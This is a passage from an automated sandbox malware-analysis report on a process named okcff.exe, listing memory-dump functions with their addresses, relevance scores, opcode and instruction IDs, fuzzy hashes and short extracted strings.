                                                            • Opcode Fuzzy Hash: 21b1f08847d8447906a1a23655229167207fb5aa961a6cfd2d087548867eae71
                                                            • Instruction Fuzzy Hash: AEA15C70E142398FCB14CFAAC980AEDB7F2BF88304F59C59AD419AB255D774A985CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542AF82, Relevance: .2, Instructions: 189COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e66143dc97998926dfc5cf40345be599bd2863354f868467e9775b4f7ffd251
                                                            • Instruction ID: 97ed772a07639aeb7f75e2ab20711a9794c4bc90999b83bdd1e70ec5fdb18f5f
                                                            • Opcode Fuzzy Hash: 2e66143dc97998926dfc5cf40345be599bd2863354f868467e9775b4f7ffd251
                                                            • Instruction Fuzzy Hash: 4D616C32F201248BD714DB69CC50AAEB3A3AFC4614F5AC065E809EB759DF35EC45CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AC915, Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7a718bd1dd4f42d6319b19566e96e4bb1b78bbe87275590f98388101d8b8c6d
                                                            • Instruction ID: c2b4a495a8d57925b1eeb560b5fba6d53fe856f12766506eec3aefd5a82cfb1a
                                                            • Opcode Fuzzy Hash: f7a718bd1dd4f42d6319b19566e96e4bb1b78bbe87275590f98388101d8b8c6d
                                                            • Instruction Fuzzy Hash: 6F219D78D04219DFDB04CFA9D884AADFBF1BB49310F10A16AE815B7360D7349941CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AC920, Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2efa29452ffb20b6241e9fc3f6f3bde4ab45dab3e9e29064a0f876d519bf5cb1
                                                            • Instruction ID: fc9d6885c4c6b503543a94b202ca5aab56edbb9736933e7ed96bf3c3bca386b0
                                                            • Opcode Fuzzy Hash: 2efa29452ffb20b6241e9fc3f6f3bde4ab45dab3e9e29064a0f876d519bf5cb1
                                                            • Instruction Fuzzy Hash: 99215DB9D04219DFDB04CFA9D884AADFBF1BB49310F14A16AE815B7360D7349941CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542C468, Relevance: 6.5, Strings: 5, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$.@ll$Duo$Duo
                                                            • API String ID: 0-2702638943
                                                            • Opcode ID: 0bd300b5ff393c12f0138af6ea1779abdf6dfd4255e9746a927aa9ac6db3e1b0
                                                            • Instruction ID: 6a7839ab6dde2d680f122f35a427b163d7c2c6a1a6d3f9dad50f6e13aae340c6
                                                            • Opcode Fuzzy Hash: 0bd300b5ff393c12f0138af6ea1779abdf6dfd4255e9746a927aa9ac6db3e1b0
                                                            • Instruction Fuzzy Hash: 60510432708230AFC311DA29A8946BFFBA6EF91320F54C56BE515CB241CB71DC06C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: okcff.exe PID: 2176 Parent PID: 2656 okcff.exeCOMMON

                                                            Executed Functions

                                                            Function 00205330, Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,G4p$J4p
                                                            • API String ID: 0-1940359148
                                                            • Opcode ID: 41bd4be68bb5f1c38741f3e9091781886e788812b764ba301c017e41a713bd1d
                                                            • Instruction ID: 1854c45752081137e694536430f75ec5286a61fc310b131011ec1326eb91f9ce
                                                            • Opcode Fuzzy Hash: 41bd4be68bb5f1c38741f3e9091781886e788812b764ba301c017e41a713bd1d
                                                            • Instruction Fuzzy Hash: DB917D70E107198FDF14CFA9C9857EEBBF2AF88314F248129E405A7291DB749895CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00202099, Relevance: 2.0, Strings: 1, Instructions: 799COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +Z
                                                            • API String ID: 0-436195615
                                                            • Opcode ID: 576fd3d47f652903b6b68fb3fb88ba1a358eeb7e54fe9fb92de8a540925eae80
                                                            • Instruction ID: fb99386085391e84b188fa5a7965705e17a57f29faf98293c8acf19809b5e29b
                                                            • Opcode Fuzzy Hash: 576fd3d47f652903b6b68fb3fb88ba1a358eeb7e54fe9fb92de8a540925eae80
                                                            • Instruction Fuzzy Hash: 5752F3307153818FD716AB34986876E7BA29B82304F1584ABD546CF7E7EB39CC09CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00206350, Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J4p
                                                            • API String ID: 0-3179121579
                                                            • Opcode ID: 85d33372c7a3d0f5522b0fe61431244b3cbd1771ec4caf23ea2b71bbece8d713
                                                            • Instruction ID: 81a0f048f0a17c033691f12c1985cadad2c4e902461faf65c1a4b931fe5792b3
                                                            • Opcode Fuzzy Hash: 85d33372c7a3d0f5522b0fe61431244b3cbd1771ec4caf23ea2b71bbece8d713
                                                            • Instruction Fuzzy Hash: 1FB17F70E103198FDB10CFA9C8897EEBBF2AF88714F148129D414E7395EB7498A5CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00205325, Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,G4p$J4p
                                                            • API String ID: 0-1940359148
                                                            • Opcode ID: 6722050c923c60c4ec504e2b3bf9495c1cf2c78c8f146391445637bc724577c8
                                                            • Instruction ID: 5c16150d9f2d86ad2fc64754d0b3e8dd621251e9e46b3a08c176cf093999ff4d
                                                            • Opcode Fuzzy Hash: 6722050c923c60c4ec504e2b3bf9495c1cf2c78c8f146391445637bc724577c8
                                                            • Instruction Fuzzy Hash: 42A15C70E107199FDB10CFA9C9857EEBBF2AF48318F248129E405A7291DB749895CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00202DB0, Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll$fCll
                                                            • API String ID: 0-2296306532
                                                            • Opcode ID: be9cc5762a5bbd812e739725438e9d83fa20423e4d9e0626e57808a06eddc5bc
                                                            • Instruction ID: fb2ceb135945454b382044bebf812dd6cfeb1b4394cba76ca776589dde87496f
                                                            • Opcode Fuzzy Hash: be9cc5762a5bbd812e739725438e9d83fa20423e4d9e0626e57808a06eddc5bc
                                                            • Instruction Fuzzy Hash: 92317130B002049FDB54AF71DC5DBAF7AA7ABC9650F148829E506E72C0DE74AC019BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002024E0, Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +Z
                                                            • API String ID: 0-436195615
                                                            • Opcode ID: baa99fe42b8a5653660674a39429b1291c8b14d35c75bd7c99895bc6d3bc5cf9
                                                            • Instruction ID: 10f0734ecd412e8e63e9b00d25dbc407f1f4422fac15dd616554290d4fc2a42d
                                                            • Opcode Fuzzy Hash: baa99fe42b8a5653660674a39429b1291c8b14d35c75bd7c99895bc6d3bc5cf9
                                                            • Instruction Fuzzy Hash: 9202E530B10300CBDB15AF74D85936D7BE2AF85308F14896AC5469B792DF3A9D498BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002069D8, Relevance: 1.7, Strings: 1, Instructions: 427COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: h\
                                                            • API String ID: 0-3510250863
                                                            • Opcode ID: d98725a4f7e00a08ad425a899d0a3b4ef4a989bdc71c2f6c64e100a7096dd59e
                                                            • Instruction ID: babcfabab6f4b1b8134b3c0bfb51be916f0c87f9a58ca5acd045c6114e406c2f
                                                            • Opcode Fuzzy Hash: d98725a4f7e00a08ad425a899d0a3b4ef4a989bdc71c2f6c64e100a7096dd59e
                                                            • Instruction Fuzzy Hash: 7CF14330A093468FC711DF78D8586AA7FB1AF46304F2584AAD044EB3A3D739DC25CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00206345, Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J4p
                                                            • API String ID: 0-3179121579
                                                            • Opcode ID: 2ed990bc63987bf31af6a61145da3bfebd73cac383d3778ba836323777f1c144
                                                            • Instruction ID: 90d8ea2dd838f5ba260f6830204d3b3ff792d418ecf250ac4f486c0aaaf67481
                                                            • Opcode Fuzzy Hash: 2ed990bc63987bf31af6a61145da3bfebd73cac383d3778ba836323777f1c144
                                                            • Instruction Fuzzy Hash: 23B17E70E1031A8FDB10CFA9C8897DEBBF1BF48714F148129E814E7295EB7598A5CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002015A8, Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: KDBM
                                                            • API String ID: 0-3504354710
                                                            • Opcode ID: bbb86d18ebdd8cdd9a555cf948e5fa0efdb2b69c610ab59c7f7986bd7c63b725
                                                            • Instruction ID: e30305974da2feda2b0a2212cf3f13902819afe739591f031d24cab5d5bff15f
                                                            • Opcode Fuzzy Hash: bbb86d18ebdd8cdd9a555cf948e5fa0efdb2b69c610ab59c7f7986bd7c63b725
                                                            • Instruction Fuzzy Hash: C381AD349152098FE701EFB8F818A4D7BB1FF9A308F008926DA06C7265DF7A9545CF62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00201900, Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <k
                                                            • API String ID: 0-713558839
                                                            • Opcode ID: 05c2cf32a37236967ae3ace4a22728ea984f2e863b7502da7ac25ebd9cb30944
                                                            • Instruction ID: 443fe2cf354f3b4d6d490c48ad0fb884a63d83802f9e40674b39faa1f8b41a01
                                                            • Opcode Fuzzy Hash: 05c2cf32a37236967ae3ace4a22728ea984f2e863b7502da7ac25ebd9cb30944
                                                            • Instruction Fuzzy Hash: 33411134B142099FC705DF68D594AAEBBF6EB8A300F24C9A6D605CB392D731DD51CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00202776, Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0597206fc9a70c4732c861eef017362dff10200b69f6c4b118c948bc0dcac185
                                                            • Instruction ID: 8fc47fc96bca19f1f2d3a9346a06194c95818b6431d13056d5568388d5074b42
                                                            • Opcode Fuzzy Hash: 0597206fc9a70c4732c861eef017362dff10200b69f6c4b118c948bc0dcac185
                                                            • Instruction Fuzzy Hash: 7191D330B00600CBD725AB34D45936E77A2ABC2304F14C92EC4578F7D5DF7A9D598BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002027B5, Relevance: .2, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 17336d59a549c2edbef9a4c4d1dceb8dd96580cd4c3ef4283f3f5e0314ac0db1
                                                            • Instruction ID: 5632af510ec667ed1bda2f322877bb3da3415fab336dae92638a4e2c91282ec4
                                                            • Opcode Fuzzy Hash: 17336d59a549c2edbef9a4c4d1dceb8dd96580cd4c3ef4283f3f5e0314ac0db1
                                                            • Instruction Fuzzy Hash: C191C230B00600CBD725AB38D85936E77A2ABC2304F14C92ED4578F795DF7A9D598BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00203624, Relevance: .2, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ae581a9c78b670d496e0151922cde1633e68cbb8ccffb2f865f506f8798735a7
                                                            • Instruction ID: ffe859a4ec646eb444004f9f6128259d392aa65220e6906bc93f9f4774c71d15
                                                            • Opcode Fuzzy Hash: ae581a9c78b670d496e0151922cde1633e68cbb8ccffb2f865f506f8798735a7
                                                            • Instruction Fuzzy Hash: 955179B0E103499FCB10CFA8C9857DEBBF6AF88304F248129E404E7391DB759A95CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00201A81, Relevance: .2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0bd2ae03ab063f2ba0c9ee25add9ff73f0f8f5d728d00c956a331abe829e4c75
                                                            • Instruction ID: 7b8c982b5f3c897afab8b3aa70c3d613b8b8a708944f169ab9d5bdf67507cc4e
                                                            • Opcode Fuzzy Hash: 0bd2ae03ab063f2ba0c9ee25add9ff73f0f8f5d728d00c956a331abe829e4c75
                                                            • Instruction Fuzzy Hash: 03517E3071D3854FD3079B3899656263FA29B83304B1A84EBE645CF2E7EA65CC29C761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00203630, Relevance: .2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d99c32766024cbee3aaa609a2e119e0b6e9945d04d56fa61286193e34cda695f
                                                            • Instruction ID: 1deca0e8280ddc0b8f141a2c02a35da07b99a718b2493c044e12e31ed9796578
                                                            • Opcode Fuzzy Hash: d99c32766024cbee3aaa609a2e119e0b6e9945d04d56fa61286193e34cda695f
                                                            • Instruction Fuzzy Hash: 545179B1E103499FCB10CFA9C9857EEBBF6AF88704F148029E405E7394DB749995CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00202C39, Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 948d02cf17882caa9ca6cf38ca405f19787751ae6f9ccb8684081f01c5326265
                                                            • Instruction ID: 0bf80ff65c21bd9cba0f319b348a67829bf1cdb6a6dcfa546bf24fd3966e5fed
                                                            • Opcode Fuzzy Hash: 948d02cf17882caa9ca6cf38ca405f19787751ae6f9ccb8684081f01c5326265
                                                            • Instruction Fuzzy Hash: 6B417631F103168FDB115BB85C0C1AEBBA1DBC5310F120967E805E3292EA348E2987A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002066D0, Relevance: .1, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76e3e96477c9da35a449560d9389606c573bcb575d24cde141a63983c0752b89
                                                            • Instruction ID: 876b9dc69165865d3b7f3de2b978b0eaa1f49d93f6ab2ad04cd1e2b55642ced5
                                                            • Opcode Fuzzy Hash: 76e3e96477c9da35a449560d9389606c573bcb575d24cde141a63983c0752b89
                                                            • Instruction Fuzzy Hash: DA41A4307053448FDB169B74D8196AE7BF1AF89304F1045AAE401DB3E2DF369D65CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00203089, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5dee61b0242ccc26cc10b255cf2862835c446e0b22c89978711a83a6da52c9c5
                                                            • Instruction ID: 5e22cb239533fcd4b4aafa995138885bfeb4f31b8f122179831e4921f2eb1bc8
                                                            • Opcode Fuzzy Hash: 5dee61b0242ccc26cc10b255cf2862835c446e0b22c89978711a83a6da52c9c5
                                                            • Instruction Fuzzy Hash: 1331AE306153408FDB02DB74C958AADBBF1AF8A300F1445AAE50ADB3E2DB75DE15CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00201C58, Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77e4573074130e25000331ce6d38722dda32d4c08d8b1f8d3262916311d95c51
                                                            • Instruction ID: 663d101f343fd257751bea53f4f01a1b9c64cf170e179cbe1b51678382e132c7
                                                            • Opcode Fuzzy Hash: 77e4573074130e25000331ce6d38722dda32d4c08d8b1f8d3262916311d95c51
                                                            • Instruction Fuzzy Hash: 5D2156347107025BEB348D59D4C072AB3E5EB59320F248D2BE85EC77D2D625EC718B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00201C47, Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02ece0aac07834da5dfdf52c4c33a859c08f9c522ce68ad59e2d9366038823c5
                                                            • Instruction ID: b0e9a3768ba6ec6353ec9f56b82dcc90fb0b53cd89b3d6df4f84e41bf4327e5a
                                                            • Opcode Fuzzy Hash: 02ece0aac07834da5dfdf52c4c33a859c08f9c522ce68ad59e2d9366038823c5
                                                            • Instruction Fuzzy Hash: A221A1347147425FEB318E59C4C0B26B7E5EB5A320F248D2BE89AC77D2C624EC718B42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00206730, Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f60632c3100128fcf118d9b945920dc656ddb90d1cc3c0ac1ee806d25bbfa10
                                                            • Instruction ID: bea06e6e85ee038b9ef6ebc8c039ee8321743782d591a8bffb7d2b1649163b0d
                                                            • Opcode Fuzzy Hash: 0f60632c3100128fcf118d9b945920dc656ddb90d1cc3c0ac1ee806d25bbfa10
                                                            • Instruction Fuzzy Hash: 4E316C30A01204CFCB54AB74D9196AD77F2AF89305F104568E802DB3A1DF369D55CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000CD48C, Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699262856.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_cd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58487aa956230b32326837855492b6798363e39defb494169db7fa68a3ace594
                                                            • Instruction ID: e6e2542ee245fc7ba0b0aca12ef52a2443d543a87aed8cf5a29c1a8c93162831
                                                            • Opcode Fuzzy Hash: 58487aa956230b32326837855492b6798363e39defb494169db7fa68a3ace594
                                                            • Instruction Fuzzy Hash: 0121F171604604DFCB15DF10E8C0F2EBFA5FB98328F24856EE9054B206C336D856CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000CD578, Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699262856.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_cd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f3d124b66ad012974c1dbc68066bd9e505c89fab4bb54408d4efb9417516713
                                                            • Instruction ID: ca7d5a262aaa3d29552397606f0a6ab7120cf3de0425adb2ec6e09d70cc37af0
                                                            • Opcode Fuzzy Hash: 2f3d124b66ad012974c1dbc68066bd9e505c89fab4bb54408d4efb9417516713
                                                            • Instruction Fuzzy Hash: 7721FFB1504244DFCB15DF10E9C0F2EBFA5FB98328F24856EE9094B246C336D856CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000DD01C, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699289585.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_dd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d94cee12b5e8088d2e6c4e61cae4c2deaa4d0072502621b99df79e36ec5bd1c
                                                            • Instruction ID: 46ae797176bc6cff71818e8cec6ad607ae4679cc520f853d4d379527f610a7e6
                                                            • Opcode Fuzzy Hash: 2d94cee12b5e8088d2e6c4e61cae4c2deaa4d0072502621b99df79e36ec5bd1c
                                                            • Instruction Fuzzy Hash: 2921D375608344DFCB64DF14D884B1ABFA5EB88314F24C56BD9094B346C33BD856CA71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002030E8, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 830ce1729c24ba53cdb6c8107968d98458361ccb3a6c31ee7da17d50b0ed6722
                                                            • Instruction ID: 63b2f78bff19a402764abb2133cb7f326bea1e9e19cb6e2d6d442bb1d2e0b906
                                                            • Opcode Fuzzy Hash: 830ce1729c24ba53cdb6c8107968d98458361ccb3a6c31ee7da17d50b0ed6722
                                                            • Instruction Fuzzy Hash: E0212A34A10204CFCB14EB78C5596AEB7F6AF8D301F204569E50AEB3A1DF759E01CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00202B7D, Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7892647bd6713b075b5b21bfaa3b9456a3019dc824fc5fd290ff0f4c76f5e614
                                                            • Instruction ID: 451253ccc96432e0b2023dc3dcaf41913a9a25944b64f7c33c7e886291cb0b22
                                                            • Opcode Fuzzy Hash: 7892647bd6713b075b5b21bfaa3b9456a3019dc824fc5fd290ff0f4c76f5e614
                                                            • Instruction Fuzzy Hash: 6411D071E10255CFCF25DFB884861ADBBF0AF09314B1944ABC446EB252E735CA55CBA0
                                                            Uniqueness

